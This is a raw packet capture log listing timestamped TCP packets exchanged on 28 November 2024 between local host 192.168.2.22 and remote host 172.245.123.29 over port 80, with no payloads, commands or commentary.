                                                                      Nov 28, 2024 07:28:11.948874950 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.948908091 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.948940039 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.952568054 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.952635050 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.952661991 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.952689886 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.956347942 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.956398964 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.956429005 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.956459045 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.960092068 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.960150003 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.960181952 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.960212946 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.963831902 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.963895082 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.963928938 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.963959932 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.967608929 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.967648983 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.967706919 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.967736959 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.971328974 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.971368074 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.971415043 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.971451044 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.975081921 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.975132942 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.975224972 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.975256920 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.978831053 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.978872061 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.978935957 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.978985071 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.982583046 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.982624054 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.982687950 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.982717991 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.986346006 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.986387014 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.986500025 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.986536980 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.990117073 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.990170956 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.990228891 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.990264893 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.993822098 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.993884087 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.993932009 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.993959904 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.997585058 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.997632980 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:11.997688055 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:11.997716904 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.024235010 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.024405956 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.024413109 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.024447918 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.026135921 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.026181936 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.026251078 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.026290894 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.029835939 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.029877901 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.105469942 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.105551958 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.105669022 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.106853962 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.106910944 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.106961012 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.107001066 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.109738111 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.109778881 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.109841108 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.109879971 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.112639904 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.112692118 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.112725019 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.112756968 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.115434885 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.115475893 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.115549088 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.115586996 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.118205070 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.118252039 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.118302107 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.118338108 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.120973110 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.121015072 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.121064901 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.121100903 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.123681068 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.123725891 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.123814106 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.123857021 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.126357079 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.126415014 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.126439095 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.126477957 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.128869057 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.128907919 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.128976107 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.129012108 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.131494045 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.131547928 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.131596088 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.131633997 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.134130001 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.134175062 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.134244919 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.134284019 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.136751890 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.136804104 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.136867046 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.136903048 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.139384985 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.139431000 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.139512062 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.139604092 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.142018080 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.142061949 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:12.142082930 CET8049166172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:12.142124891 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:13.606990099 CET4916680192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:16.578568935 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:16.698635101 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:16.698880911 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:16.699031115 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:16.819048882 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864547014 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864597082 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864609003 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864629984 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.864675999 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.864752054 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864763021 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864773989 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864787102 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.864790916 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.864819050 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.864855051 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.865030050 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.865045071 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.865056038 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.865091085 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.865091085 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.881278992 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.984885931 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.984905005 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.985135078 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:17.988841057 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:17.988909006 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.065979958 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.065999031 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.066122055 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.069926023 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.070002079 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.070017099 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.070091009 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.078351974 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.081331968 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.081403017 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.081461906 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.081478119 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.081513882 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.089785099 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.089863062 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.089905024 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.089956045 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.098226070 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.098301888 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.098316908 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.098392010 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.106630087 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.106722116 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.106729031 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.109325886 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.115065098 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.115104914 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.115175009 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.115214109 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.123488903 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.123538971 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.123558998 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.123619080 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.131181955 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.131236076 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.131283998 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.131329060 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.138886929 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.138942957 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.138978004 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.139041901 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.146570921 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.146621943 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.146701097 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.146750927 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.186206102 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.186266899 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.267003059 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.267035007 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.267064095 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.267098904 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.268255949 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.268296003 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.268368006 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.268410921 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.273112059 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.273156881 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.273180008 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.273217916 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.277883053 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.277921915 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.277967930 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.278017044 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.282766104 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.282808065 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.282885075 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.282946110 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.287548065 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.287591934 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.287642956 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.287692070 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.292402983 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.292448044 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.292506933 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.292537928 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.297234058 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.297276974 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.297497034 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.297543049 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.301944971 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.302031994 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.302056074 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.302079916 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.306746960 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.306828022 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.306854963 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.306914091 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.311568975 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.311615944 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.311681986 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.311758995 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.316390991 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.316431046 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.316553116 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.316585064 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.320292950 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.320313931 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.320331097 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.320427895 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.324029922 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.324069977 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.324139118 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.324207067 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.327877045 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.327922106 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.327986956 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.328039885 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.331690073 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.331742048 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.331800938 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.331837893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.335608959 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.335656881 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.335736990 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.335772991 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.339368105 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.339417934 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.339476109 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.339519024 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.343170881 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.343215942 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.343369961 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.343445063 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.347033978 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.347101927 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.347103119 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.347343922 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.350877047 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.350925922 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.350943089 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.350982904 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.354656935 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.354717970 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.354720116 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.354811907 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.468398094 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.468453884 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.468460083 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.468508005 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.469783068 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.469829082 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.469898939 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.469985962 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.472635984 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.472676992 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.472795963 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.472831964 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.475471020 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.475528002 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.475570917 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.475613117 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.478349924 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.478391886 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.478450060 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.478513002 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.481137991 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.481193066 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.481249094 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.481292009 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.483834982 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.483892918 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.483937979 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.483989000 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.486365080 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.486423016 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.486526966 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.486572981 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.489192009 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.489330053 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.489362001 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.489379883 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.491784096 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.491838932 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.492033005 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.492084980 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.494479895 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.494514942 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.494550943 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.494550943 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.497129917 CET8049167172.245.123.29192.168.2.22
